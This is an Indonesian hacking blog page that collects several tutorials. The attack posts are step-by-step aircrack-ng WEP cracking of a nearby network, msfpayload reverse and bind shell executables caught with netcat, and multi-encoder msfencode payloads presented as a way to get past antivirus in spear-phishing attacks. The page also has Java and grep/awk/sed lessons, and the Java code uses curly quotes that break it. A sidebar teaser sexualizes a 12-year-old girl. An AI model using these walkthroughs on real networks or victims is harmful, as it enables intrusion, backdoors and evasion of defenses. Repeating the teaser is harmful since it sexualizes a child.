Tutorial Cracking WEP dengan menggunakan Backtrack 3 Final
Ok....
Seperti biasa,,,Siapkan alat perang dulu...1. Pertama kamu harus punya laptop pastinya..(kalo bisa yang atheros punya)
2. Kedua, kamu harus menginstal Backtrack..(terserah mw backtrack brp)
3. Harus berada di tempat yang terdapat jaringan dengan menggunakan enkripsi WEP.
Selanjutnya....
Hal pertama yang harus kamu lakukan adalah...
[*] Buka console
[*] Ketikkan perintah 'airmon-ng' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep1.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep1.jpg)
[*] Kemudian ketikkan command 'airmon-ng stop ath0' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep2.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep2.jpg)
[*] Masih di console yang sama ketikkan command 'airmon-ng start wifi0' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep3.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep3.jpg)
[*] Kemudian ketik lagi command 'airodump-ng ath0' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep4.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep4.jpg)
[*] lalu buka console baru lalu ketikkan command 'airodump-ng --channel 6 --bssid 00:21:27:E8:AF:16 -w hasil ath0' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep5.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep5.jpg)
[*] Kita gunakan arp replay agar packet yang didapatkan menjadi lebih besar dengan buka console baru lalu ketikkan command 'aireplay-ng --arpreplay -b 00:21:27:E8:AF:16 - h 00:0E:35:7E:62:86 ath0' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep6.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep6.jpg)
[*] Lalu apabila ivs nya udah banyak..yah kira-kira 25000,,anda boleh melakukan proses cracking..buka console baru..kemudian ketikkan command 'aircrack-ng hasil*.cap' (tanpa tanda ')
seperti pada gambar berikut :
![[Image: wep7.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep7.jpg)
![[Image: wep8.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep8.jpg)
[*] Lalu kemudian bakalan muncul pilihan index number of target network...lalu kita ketikkan angka dimana target akan kita crack wep ny.
seperti pada gambar berikut ini :
![[Image: wep9.jpg]](http://i657.photobucket.com/albums/uu295/rully_punkrock/wep9.jpg)
Nah...pada proses cracking ini membutuhkan sedikit waktu..yah g sampe 1 menit kok....
seperti pada gambar berikut :
About: jefri
You may also like...
Membuat Program JAVA dengan “IF” (Kondisi)
Kali ini aku mau sharing tentang bagaimana cara membuat program java dengan menggunakan beberapa kondisi. Sebelumnya harus diketahui dahulu logika (algoritma) tentang pengkondisian itu sendiri. Dalam kehidupan nyata kita sering dihadapkan dengan kondisi-kondisi dimana kita harus memilih salah satu kondisi untuk menyelesaikan suatu masalah.
Ketika kita lapar maka secara tidak sadar kita akan menggunakan algoritma untuk menyelsaikan masalah tersebut, “Jika saya lapar maka saya makan, jika tidak sakit perut”.. “IF saya lapar “THEN” saya makan “ELSE” saya sakit perut. Ini adalah contoh permasalahan dengan 2 kondisi. Begitupun dalam program, kita akan mengkondisikan suatu alur program untuk menyelesaikan permasalahan yang dicari.
Pada posting kali ini aku mau mencoba membuat program sederhana dengan menggunakan 3 kondisi untuk menentukan diskon pada sebuah toko, format program dan kondisinya sebagai berikut :
Nama Pelanggan : <input>
Nama Barang : <input>
Harga Barang : <input>
Jumlah Barang : <input>
kondisi =
Jika jumlah barang lebih dari 20 maka Diskon 20%
Jika jumlah barang lebih dari 15 maka Diskon 15%
Jika jumlah barang lebih dari 10 maka Diskon 10%
Jika tidak (kurang dari 10) maka Diskon 0% atau tidak mendapat Diskon
***
Berikut coding programnya :
import java.io.*; //meng-import java.io kedalam program
public class ProgramJavaDenganIF
{
public static void main(String args[])
{
try //sintax java untuk menangkap kesalahan ketik dari user
{
String nama, na_brg, ket, ket2; //deklarasi variable dengan tipe data String
double prc, qty, sum, dis, sum_spd; //deklarasi variable dengan tipe data double
System.out.println(“============================”);
System.out.println(“-PROGRAM TOKO SUBUR MAKMUR-”);
System.out.println(“============================”);
BufferedReader type=new BufferedReader (new InputStreamReader (System.in)); //sintax yang berfungsi untuk menahan proses pembacaan program hingga ada input dari user (input basis text)
System.out.print(“Nama : “);
nama=type.readLine(); //input dari user yang dibaca program dengan tipe data string
System.out.print(“Nama Barang : “);
na_brg=type.readLine();
System.out.print(“Harga Barang : “);
prc=Integer.parseInt(type.readLine()); //input dari user yang dibaca program dengan tipe data integer
System.out.print(“Banyak Barang : “);
qty=Integer.parseInt(type.readLine());
sum=qty*prc; //proses
if (qty>=20){ //sintax IF, kalau diartikan = jika variable “qty” lebih atau sama dengan 20, maka… (lanjutkan mebaca keterangan ke bawah)
dis=sum*0.2; //total bayar dikali 0.2 atau artinya 20%
ket=”Discount 20%”; //penambahan variable “ket” sebagai output yang akan dicetak
ket2=”, Anda Menghemat Uang Belanja Sebesar Rp. “;}
else if (qty>=15){
dis=sum*0.15;
ket=”Discount 15%”;
ket2=”, Anda Menghemat Uang Belanja Sebesar Rp. “;}
else if (qty>=10){
dis=sum*0.1;
ket=”Discount 10%”;
ket2=”, Anda Menghemat Uang Belanja Sebesar Rp. “;}
else {
dis=sum*0;
ket=”Discount 0%”;
ket2=”, Anda Menghemat Uang Belanja Sebesar Rp. “;}
sum_spd=sum-dis;
System.out.println(“Jumlah : “+sum); //output
System.out.println(“Discount : “+ket);
System.out.println(“Total Bayar : “+sum_spd);
System.out.println(nama+ket2+dis+” ^_^a”);
}
catch (IOException e)
{e.printStackTrace();}
}
}
Itulah program Java dengan IF, semoga bermanfaat

Ini hanyalah program yang aku tulis dengan pemahaman ku sendiri (yang masih dangkal) tetang java, jadi aku sangat mengharapkan kritik jika terdapat kesalahan demi kemajuan yang lebih baik

About: jefri
You may also like...
Do More With CLI [Part 1]
Linux memang identik dengan CLI (Command Line Interpreter), pengguna yang manja akan lebih menyukai menggunakan kursornya untuk melakukan setiap hal, bahkan hal yang mudah. Dan ini terjadi hampir terjadi pada setiap pengguna << back | track yang notabene adalah mantan pengguna windows. "The real hacker is not using GUI"!
Oke, pertanyaan yang sering keluar adalah: "Bagaimana cara melatih penggunaan CLI?" Anda bisa mempelajarinya dari hal terkecil. Yaitu perintah grep. Grep berfungsi untuk mencari string yang dikehendaki. Ini sama dengan perintah find text pada windows. Kali ini saya akan memberikan 3 Tutorial sekaligus, yaitu tutorial grep, tutorial awk, dan tutorial sed. Dan anda bisa mencobanya sendiri.
Preparation:
[*] Terminal terletak pada Applications - Accessories - Terminal
Goal:
[*] Menampilkan IP address pada terminal
Walkthrough:
1. Grep
Buka terminal, lalu masukan perintah
Command:
root@revolution:/# ifconfig wlan0
Kita akan menampilkan konfigurasi IP pada device wlan0 (WiFi Device)
Output:
root@revolution:/# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:24:36:5c:ed:e3
inet addr:192.168.1.7 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::224:36ff:fe5c:ede3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:96332 errors:0 dropped:0 overruns:0 frame:0
TX packets:41418 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:49392027 (49.3 MB) TX bytes:7373200 (7.3 MB)
Kita telah mendapatkan konfigurasi IP dari wlan0. Langkah selanjutnya adalah menggunakan perintah grep. Masukan perintah:
Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:"
Perintah grep akan mencari string "inet addr:" pada output ifconfig wlan0.
Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:"
inet addr:192.168.1.7 Bcast:192.168.1.255 Mask:255.255.255.0
Ok. Sekarang output kita semakin berkurang, dari 7 baris, menjadi 1 baris saja. Lalu, bagaimana caranya agar output menghasilkan 192.168.1.7 ?
2. Awk
Langkah selanjutnya adalah menyingkirkan inet, Bcast, dan Mask. Kita akan menggunakan perintah awk. Perintah awk akan memilih text yang berada pada kolom tertentu. Dalam output di atas, kolom 1 bernilai : inet. Dipisahkan oleh spasi terdapat kolom 2, yaitu addr:192.168.1.7. Dipisahkan oleh spasi teradapat kolom 3, yaitu Bacst:192.168.1.255. Dan dipisahkan oleh spasi terdapat kolom terakhir, yaitu Mask:255.255.255.0. Kita akan memilih kolom ke dua, sehingga ouput kita akan menampilkan value dari kolom ke 2. Masukan perintah:
Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'
awk '{print $2}' akan menampilkan nilai dari kolom ke dua, yaitu addr:192.168.1.7. Terlihat dari output kita di bawah:
Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'
addr:192.168.1.7
Ok, sekarang hasil kita semakin sedikit. Kali ini kita akan menyingkirkan addr: untuk mendapatkan output berupa IP address.
3. Sed
Langkah berikutnya adalah menyingkirkan string addr: dari output kita, sehingga kita mendapatkan output 192.168.1.7. Untuk menyingkirkan string tertentu, perintah sed adalah sed 's/[STRING YANG AKAN DIHAPUS]//' Masukan perintah berikut:
Command:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'
Perintah di atas akan menghapus string addr:, maka output yang akan terlihat adalah.
Output:
root@revolution:/# ifconfig wlan0 | grep "inet addr:" | awk '{print $2}'| sed 's/addr://'
192.168.1.7
Excellent!
About: jefri
You may also like...
Perbedaan Reverse TCP dan Bind TCP
Pengguna metasploit untuk tingkat pemula, mungkin pernah bertanya-tanya. Apa perbedaan payload reverse_tcp dengan payload bind_tcp? Sederhananya, reverse adalah perintah dari attacker kepada korban, untuk menghubungi korban.
Sementara bind tcp adalah perintah dari attacker kepada korban, untuk membuka akses kepada attacker. Ilustrasinya seperti ini
[reverse_tcp]
attacker -> [hubungi saya di port 4444] -> victim
setelah payload dieksekusi
attacker <-> [port 4444] <-> victim
[bind_tcp]
attacker -> [buka jalan untuk saya di port 4444] -> victim
setelah dieksekusi
attacker <-> [port 4444] <-> victim
Untuk membuktikannya, saya akan mengadakan percobaan mengenai payload. Anda bisa mencoba sendiri di rumah.
Tools requirements:
[*] msfpayload dapat ditemukan di backtrack 5
[*] netcat dapat ditemukan di backtrack 5
[*] vmware player
[*] windows XP SP 2
System requirements:
[*] VMware menggunakan koneksi NAT
[*] IP address attacker vmnet8 10.10.10.1
[*] IP address victim vmnet8 10.10.10.128
[*] Windows XP di dalam vmware telah terinstall vmware tools
Walk-through:
1. Buat PAYLOAD windows/shell_reverse_tcp
Buka terminal, kemudian masukan perintah:
Command:
root@revolution:~# msfpayload windows/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 X > /tmp/reverse.exe
Keterangan:
[*] saya akan membuat payload windows/shell_reverse_tcp
[*] ip address saya 10.10.10.1
[*] port listener saya tentukan di 4444
[*] payload ini saya simpan di folder /tmp dengan nama reverse.exe
Buka folder /tmp, kemudian copy file reverse.exe, kemudian paste di windows XP. Kembali ke terminal, kemudian masukan perintah:
Command:
root@revolution:~# nc -l -v -p 4444
Keterangan:
[*] saya menggunakan netcat sebagai handler terhadap koneksi yang masuk
[*] menentukan netcat sebagai listener (-l)
[*] menentukan netcat untuk mengaktifkan verbose mode (-v)
[*] menentukan netcat untuk melakukan listening pada port 4444 (-p 4444)
Kemudian jalankan file reverse.exe yang ada di windows xp.
Maka ini yang akan terjadi:
Command:
root@revolution:~# nc -l -v -p 4444
listening on [any] 4444 ...
10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.10.10.1] from (UNKNOWN) [10.10.10.128] 1062
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>
FAQ [Frequently Asked Questions]
[Q] Apa fungsi payload yang kita buat?
[A] Payload yang kita buat, memiliki perintah dari attacker kepada victim untuk menghubungi attacker di port 4444
[Q] Mengapa kita mendapatkan command prompt milik victim?
[A] Itu karena payload yang kita buat adalah shell_reverse_tcp, ini berfungsi agar netcat mengeksekusi shell aka command prompt (pada windows) setelah konesi di port 4444 terjadi
[Q] Bisakah saya menentukan di port yang berbeda selain 4444?
[A] Bisa, dengan syarat port tersebut sedang tidak digunakan oleh proses lain, misalkan port 80 yang biasa digunakan oleh Apache, atau 22 yang biasa digunakan oleh OpenBSD untuk SSH connection.
2. Buat payload windows/shell_bind_tcp
Buka terminal, kemudian masukan perintah:
Command:
root@revolution:~# msfpayload windows/shell_bind_tcp LPORT=4444 X > /tmp/bind.exe
Keterangan:
[*] Saya akan membuat payload windows/shell_bind_tcp
[*] Saya menentukan 4444 sebagai port listener agar attacker dapat masuk ke system milik victim
[*] Saya menyimpan payload di folder /tmp dengan nama bind.exe
Buka folder /tmp, kemudian copy bind.exe ke Windows XP. Jangan jalankan file ini terlebih dahulu!
Buka command prompt windows, kemudian ketik
Command:
C:\Documents and Settings\User> netstat -an | find "4444"
Keterangan:
[*] netstat adalah perintah command prompt untuk mengecek koneksi yang terjadi dalam sebuah system
[*] saya akan mengecek, apakah port 4444 terbuka
Terlihat bahwa port 4444 tidak terbuka. Setelah itu, jalankan file bind.exe. Kemudian masukan perintah netstat kembali pada command prompt:
Command:
C:\Documents and Settings\User> netstat -an | find "4444"
Terlihat bahwa sekarang muncul port 4444 yang melakukan listening terhadap koneksi. Kali ini kita akan menggunakan netcat untuk mendapatkan command prompt milik victim.
Command:
root@revolution:~# nc -v 10.10.10.128 4444
Maka ini yang akan terjadi:
Command:
root@revolution:~# nc -v 10.10.10.128 4444
10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [10.10.10.128] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\User\Desktop>
Keterangan:
[*] Kali ini saya akan menghubungi IP address victim [10.10.10.128]
[*] Saya akan mencoba port 4444 untuk akses masuk
FAQ [Frequently Asked Question]
[Q] Apa yang terjadi?
[A] Payload kita telah membuat victim membuka port 4444 agar attacker dapat masuk ke system korban
About: jefri
You may also like...
The Power of Encoder (Membuat Payout)
Membuat payload dan mengirimnya kepada target dengan metode spear pishing attack adalah cara termudah dalam melakukan exploitasi. Namun windows sudah mengantisipasi hal ini, beberapa vendor antivirus berlomba-lomba membuat antivirus yang mumpuni untuk membasmi payload milik attacker. Masalahnya adalah, bagaimana cara bypassing antivirus ini?
Metasploit telah menyediakan beberapa tools untuk melakukan penetrasi test. Diantaranya adalah msfpayload untuk membuat payload, dan msfencode untuk melakukan encoding. Msfencode memungkinkan attacker untuk membuat payload denan kedok terbaik yang dapat mem-byassing antivirus.
Pertanyaannya adalah, benarkah encoder ini berfungsi? Dalam kesempatan ini saya akan menunjukan bagaimana encoder bekerja, dan membuktikan bahwa encoder memiliki peran penting dalam melakukan bypass antivirus.
Preparation:
[*] msfpayload
[*] msfencode
Briefing:
[*] buat payload dengan encoder
[*] buat payload tanpa encoder
[*] upload kedua file ke VirusTotal
Kali ini saya akan melakukan encoding virus dengan 3 encoder yang berbeda.
Command:
root@revolution:/# msfpayload windows/shell_reverse_tcp lhost=172.16.230.1 lport=4444 R | msfencode -a x86 -e x86/shikata_ga_nai -c 8 t raw | msfencode -a x86 -e x86/call4_dword_xor -c 8 -t raw | msfencode -a x86 -e x86/jmp_call_additive -c 8 -t raw | msfencode -a x86 -e x86/shikata_ga_nai -c 8 t exe > /tmp/cmd.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 476 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 503 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 530 (iteration=8)
[*] x86/call4_dword_xor succeeded with size 2342 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 2370 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 2398 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 2426 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 2454 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 2482 (iteration=6)
[*] x86/call4_dword_xor succeeded with size 2510 (iteration=7)
[*] x86/call4_dword_xor succeeded with size 2538 (iteration=8)
[*] x86/jmp_call_additive succeeded with size 2569 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 2601 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 2633 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 2665 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 2697 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 2729 (iteration=6)
[*] x86/jmp_call_additive succeeded with size 2761 (iteration=7)
[*] x86/jmp_call_additive succeeded with size 2793 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 2822 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 2851 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 2880 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2909 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2938 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 2967 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 2996 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 3025 (iteration=8)
Keterangan:
[*] Saya menggunakan payload windows/shell_reverse_tcp
[*] IP address saya 172.16.230.1
[*] Menentukan port listener di 4444
[*] Kali ini saya akan melakukan encoding dengan arsitektur 32 bit (-a x86)
[*] Menggunakan encoder x86/shikata_ga_nai (-e x86/shikata_ga_nai)
[*] Melakukan encoding sebanyak 8 kali (-c 8)
[*] Menyimpannya dengan format raw (-t raw)
[*] Mengenkode kembali menggunakan encoder x86/call4_dword_xor (-e x86/call4_dword_xor)
[*] Melakukan encoding sebanyak 8 kali (-c 8)
[*] Menyimpannya dengan format raw (-t raw)
[*] Mengenkode kembali menggunakan encoder x86/jmp_call_additive (-e x86/jmp_call_additive)
[*] Melakukan encoding sebanyak 8 kali (-c 8)
[*] Menyimpannya dengan format raw (-t raw)
[*] Mengenkode kembali menggunakan encoder x86/shikata_ga_nai (-e x86/shikata_ga_nai)
[*] Melakukan encoding sebanyak 8 kali (-c 8)
[*] Menyimpannya dengan format exe
[*] Menyimpannya di dalam direktori /tmp/ dengan nama file cmd.exe
2. Buat payload tanpa encoder
Command:
root@revolution:/# msfpayload windows/shell_reverse_tcp lhost=172.16.230.1 lport=4444 X > /tmp/backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"lhost"=>"172.16.230.1", "lport"=>"4444"}
About: jefri
You may also like...
Langganan:
Postingan (Atom)
Recent Posts
Popular Posts
-
1.LOAD_FILE Load file adalah query SQL untuk meng-load suatu file scara remote..kurang lebihnya seperti itu ..
-
assalamualaikummm permisi bang ane cuma mau share,.... gimana cara atau trik membuat Flashing screen ( atau layar menjadi kelap kelip,....)
-
pada kamus ini terdapat pilihan opsi dari bahasa Perancis ke Indonesia, dari bahasa Indonesia ke Perancis, lihat seluruh kata, tes, help se...
-
Situs jejaring sosial seperti Twitter dan Facebookbisa menjadi sarana flirting dan aturan berpacaran lewat situs jejaring sosial ini...
-
siap meluncur di tunggu dari kawan kawan untuk sharing bugs and scaning pake bot
-
Buat Ngerjaain Koneksi Orang Gunakan Seperlunya... Misalnya buat mutusin koneksi orang yang lagi buka situs porno
-
Apakah Anda punya sahabat atau rekan yang tampan, mapan tapi sampai sekarang masih senang sendiri dan belum berkeinginan punya pacar. Wa...
-
ada model baru dari vietnam. baru 12 taun gan. liat kaki nya deh gan, bikin deg deg an Cewek Idaman : Lê Hoàng Bảo Trân (Le Hoang Bao ...
-
Assalamu alaikum Sudah lama tidak posting blog nih disini saya akan membahas cara membuat program transaksi penjualan dengan Fox pro ...
-
Ciuman adalah bahasa tubuh yang populer untuk mengungkapkan rasa sayang kepada pasangan, teman maupun keluarga. Tapi ada beberapa tipe...
Recent Comments
Labels
Labels
Find us on Facebook
Labels
- backtrack (47)
- berita (12)
- blogseo (6)
- education (1)
- foxpro (2)
- hacking (78)
- Ilmu Komputer (131)
- info unik (32)
- intim (12)
- kesehatan (23)
- lounge (4)
- love (11)
- network (1)
- Network-Linux (1)
- network-windows (1)
- olahraga (5)
- pascal (2)
- php (1)
- programer (29)
- relationship (23)
- sqljavascriptdll (7)
- Virus (1)
- webhacking (9)
- wifihack (8)